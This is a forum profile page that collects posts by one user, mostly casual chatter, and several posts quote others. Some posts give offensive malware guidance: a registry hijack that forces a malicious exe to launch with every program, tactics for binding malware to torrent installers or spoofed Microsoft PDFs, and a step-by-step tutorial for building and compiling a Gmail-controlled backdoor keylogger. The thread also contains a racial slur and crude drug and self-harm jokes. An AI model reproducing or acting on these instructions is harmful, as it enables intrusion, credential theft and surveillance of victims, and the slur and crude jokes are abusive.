User Controls

  1. 1
  2. 2
  3. 3
  4. 4
  5. 5
  6. 6
  7. 7
  8. 8
  9. 9

Posts by chem2211

  1. chem2211 Houston
    OMG...I couldn't even watch that a second time
  2. chem2211 Houston
    I've never liked the look of popped up collars. I think they look ridiculous no matter who's wearing them.
  3. chem2211 Houston
    Pretty cool program. Nothing wrong with strengthening your web security.
  4. chem2211 Houston
    Yeah some people are just naturally bug-eyed. Like the pic Spectral posted. I've seen that lady in other pictures and her eyes always look the same.

    . Relax them eyes biotch!!
  5. chem2211 Houston
    Malware is fun.

    Depends which end you're on
  6. chem2211 Houston
    This would ensure that every time they open a program on their machine, the malicious program would also start. And if they remove the malicious program, no programs on the machine will be able to start at all until it is restored. Nasty.


    [HKEY_CLASSES_ROOT\exefile\shell\open\command]
    @="\"youwho!.exe %1\" %*"

    Ruthless
  7. chem2211 Houston
    Bind the exe to a legitimate installer for a popular program and distribute through torrents. Or bind the exe to a PDF file and do a social engineering attack where you spoof an email from a company like microsoft(You're targetting windows anyway) saying they have changed their terms of service and if you would be so kind as to read the new terms in the PDF provided.

    Scrap that i was thinking different kind of exploit.

    Damn, you would get a lot of people like that...lol..Especially the torrent idea..But does the "exe" show up as malware when scanned? You know how people are when downloading from torrent sites. Shit, I gotta read the comments first..make sure torrent is legit. Then my internet security gotta be turned on before any downloading
  8. chem2211 Houston
    Yes but what ya'll niggers are forgetting is that if you don't have your keylogger contact a remote host to send everything it logs your program is basically useless, no offense.

    Here's something more useful.

    Backdoor with keylogger for windows.

    https://github.com/byt3bl33d3r/gcat/...ter/implant.py

    And your controller.

    https://github.com/byt3bl33d3r/gcat/blob/master/gcat.py

    You'll need python of courrse and these libs: (They have to be installed)

    http://sourceforge.net/projects/pywin32/
    http://sourceforge.net/projects/pyhook/

    You'll also need to go into your python folder and find pip.exe to install that module so you can screencap your victim's desktop.

    EDIT: Forgot to mention that you need to run pyhton pip.exe install pillow to get the module installed that you need.

    You're going to have to setup a gmail as command and control server and have to tell the program where to send and recieve commands from you do that by changing the following variables:


    #######################################
    gmail_user = 'example@gmail.com'
    gmail_pwd = 'password'
    server = "smtp.gmail.com"
    server_port = 587
    #######################################


    Change variable gmail_user to equal the adress you set up. Change variable gmail_pwd to equal the password you created for that account.

    You're going to have to compile implant.py with py2exe.

    http://sourceforge.net/projects/py2exe/

    Your controller gcat you can just run from the command line.

    Lanny was kind enough to hook me up with a script to help compile implant.py. Open up your favorite text editor and enter the following code and save it as setup.py


    try:
    # py2exe 0.6.4 introduced a replacement modulefinder.
    # This means we have to add package paths there, not to the built-in
    # one. If this new modulefinder gets integrated into Python, then
    # we might be able to revert this some day.
    # if this doesn't work, try import modulefinder
    try:
    import py2exe.mf as modulefinder
    except ImportError:
    import modulefinder
    import win32com, sys
    for p in win32com.__path__[1:]:
    modulefinder.AddPackagePath("win32com", p)
    for extra in ["win32com.shell"]: #,"win32com.mapi"
    __import__(extra)
    m = sys.modules[extra]
    for p in m.__path__[1:]:
    modulefinder.AddPackagePath(extra, p)
    except ImportError:
    # no build path setup, no worries.
    pass

    from distutils.core import setup
    import py2exe

    setup(console=["implant.py"], options={"py2exe": {"packages": ["email"]}})


    When that's done open up a command prompt and use the command cd to go to the directory where you have saved implant.py and setup.py and run the command: python setup.py py2exe, to compile. If you're smart you'll structure your command like this -> "python setup.py py2exe >> log.txt" then you can check what your terminal outputs in the dump log.txt to see if everything went well.

    Note: You may want to use https://github.com/pyinstaller/pyinstaller instead of py2exe because py2xe had some problems importing the email modules.

    Major props to lanny for helping me out with this backdoor with gmal as C&C server <3. I was kind of excited so i thought i'd share, if you have any questions i'll try to answer them, it took me a bit and i am still fiddling with program but i do believe i got everything to work i am currently testing it's functionality. Also before i foget after you compile you're going to have some directories and implant.exe, you're going to have to get all of your dependencies in a single file it's a little more involved with py2.exe but with pyinstaller it's as simple as adding –onefile to the command line when compiling. Which is why you might want to opt for pyinstaller in general.

    Setting up a Gmail is about the only thing I understood....No but seriously, I understand what this program does, but how is it installed into the target computer?
  9. chem2211 Houston
    and that mirtazapine makes you stare at yourself in the mirror and jack off looking yourself in the eye while holding a knife to your throat


    lolol

  10. chem2211 Houston
    I'm not computer savvy like most people on this site. I download too much shit (music,movies,programs, etc) not to have a security software.. Anyways,I never pay for those security software.
  11. chem2211 Houston
    The guy with the knife sold u out by threatening your friend and leaving u dry at the end. And your friend that mixed up the bags, he most likely was trying to get over on the guy with the knife and got screwed himself. Then he wants to blame you. Both of them sound like dickheads. Cut both of them off.
  12. chem2211 Houston
    Kaspersky blacklisted my keys after 3 years free service. And their 2015 programs don't have hacks. Any suggestions on a good internet security program?
  13. chem2211 Houston
    Isn’t worth it. Nasty side effects.
  14. chem2211 Houston
  15. chem2211 Houston

  16. chem2211 Houston
    In Which We Parrot p4k Reviews


  17. chem2211 Houston


  18. chem2211 Houston
    It's picked up new members and I see more posts. Viva space!!!
  19. chem2211 Houston
    UPDATE: Onset fucked with me.

  20. chem2211 Houston
    Just got...
  1. 1
  2. 2
  3. 3
  4. 4
  5. 5
  6. 6
  7. 7
  8. 8
  9. 9
Jump to Top